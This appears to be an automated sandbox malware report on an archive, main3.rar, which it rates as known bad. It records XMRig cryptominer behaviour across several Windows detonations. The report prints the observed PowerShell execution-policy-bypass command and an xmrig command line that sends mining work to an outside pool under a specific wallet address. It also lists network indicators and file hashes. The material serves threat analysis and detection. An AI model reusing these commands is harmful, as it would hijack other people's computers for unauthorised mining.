Analysis Overview
SHA256
4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88
Threat Level: Known bad
The file main3.rar was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-04 03:15
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:06
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4112 wrote to memory of 3824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4112 wrote to memory of 3824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
Files
memory/4112-3-0x00007FFF43B33000-0x00007FFF43B34000-memory.dmp
memory/4112-5-0x0000019FAFEE0000-0x0000019FAFF02000-memory.dmp
memory/4112-6-0x00007FFF43B30000-0x00007FFF4451C000-memory.dmp
memory/4112-10-0x00007FFF43B30000-0x00007FFF4451C000-memory.dmp
memory/4112-9-0x0000019FC8560000-0x0000019FC85D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s3vkapan.2sm.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4112-25-0x00007FFF43B30000-0x00007FFF4451C000-memory.dmp
memory/4112-48-0x0000019FAFFB0000-0x0000019FAFFC2000-memory.dmp
memory/4112-61-0x0000019FAFF70000-0x0000019FAFF7A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3824-90-0x000001940E020000-0x000001940E040000-memory.dmp
memory/3824-91-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/4112-92-0x00007FFF43B30000-0x00007FFF4451C000-memory.dmp
memory/4112-93-0x00007FFF43B33000-0x00007FFF43B34000-memory.dmp
memory/3824-94-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-95-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-96-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-97-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-98-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-99-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-100-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-101-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-102-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-103-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-104-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-105-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-106-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-107-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-108-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-109-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-110-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-111-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-112-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-113-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-114-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-115-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-116-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-117-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-118-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-119-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-120-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-121-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-122-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-123-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-124-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-125-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-126-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-127-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-128-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-129-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-130-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-131-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-132-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-133-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-134-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-135-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-136-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-137-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-138-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-139-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-140-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-141-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-142-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-143-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-144-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-145-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-146-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-147-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-148-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-149-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-150-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-151-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-152-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-153-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-154-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-155-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:17
Platform
win11-20240508-en
Max time kernel
1719s
Max time network
1729s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/1576-0-0x00007FFCE84B3000-0x00007FFCE84B5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bedtkilz.fbv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1576-9-0x0000027112A10000-0x0000027112A32000-memory.dmp
memory/1576-10-0x00007FFCE84B0000-0x00007FFCE8F72000-memory.dmp
memory/1576-11-0x00007FFCE84B0000-0x00007FFCE8F72000-memory.dmp
memory/1576-12-0x00007FFCE84B0000-0x00007FFCE8F72000-memory.dmp
memory/1576-13-0x00007FFCE84B3000-0x00007FFCE84B5000-memory.dmp
memory/1576-14-0x00007FFCE84B0000-0x00007FFCE8F72000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:41
Platform
win10v2004-20240611-en
Max time kernel
1793s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2636 wrote to memory of 2040 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2636 wrote to memory of 2040 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp |
Files
memory/2636-0-0x00007FFCCC4C3000-0x00007FFCCC4C5000-memory.dmp
memory/2636-2-0x0000018378A20000-0x0000018378A42000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2nn0bk4f.5en.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2636-11-0x00007FFCCC4C0000-0x00007FFCCCF81000-memory.dmp
memory/2636-12-0x00007FFCCC4C0000-0x00007FFCCCF81000-memory.dmp
memory/2636-14-0x00007FFCCC4C0000-0x00007FFCCCF81000-memory.dmp
memory/2636-16-0x0000018379610000-0x000001837961A000-memory.dmp
memory/2636-15-0x00000183799C0000-0x00000183799D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2040-47-0x000001A6039D0000-0x000001A6039F0000-memory.dmp
memory/2040-48-0x000001A6052D0000-0x000001A6052F0000-memory.dmp
memory/2040-49-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2636-51-0x00007FFCCC4C0000-0x00007FFCCCF81000-memory.dmp
memory/2636-50-0x00007FFCCC4C3000-0x00007FFCCC4C5000-memory.dmp
memory/2040-53-0x000001A6052F0000-0x000001A605310000-memory.dmp
memory/2040-54-0x000001A605310000-0x000001A605330000-memory.dmp
memory/2040-52-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2636-55-0x00007FFCCC4C0000-0x00007FFCCCF81000-memory.dmp
memory/2040-56-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-57-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-58-0x000001A6052F0000-0x000001A605310000-memory.dmp
memory/2040-59-0x000001A605310000-0x000001A605330000-memory.dmp
memory/2040-60-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-61-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-62-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-63-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-64-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-65-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-66-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-67-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-68-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-69-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-70-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-71-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-72-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-73-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-74-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-75-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-76-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-77-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-78-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-79-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-80-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-81-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-82-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-83-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-84-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-85-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-86-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-87-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-88-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-89-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-90-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-91-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-92-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-93-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-94-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-95-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-96-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-97-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-98-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-99-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-100-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-101-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-102-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-103-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-104-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-105-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-106-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-107-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-108-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-109-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-110-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-111-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-112-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-113-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-114-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-115-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-116-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-117-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-118-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:14
Platform
win11-20240611-en
Max time kernel
1798s
Max time network
1791s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
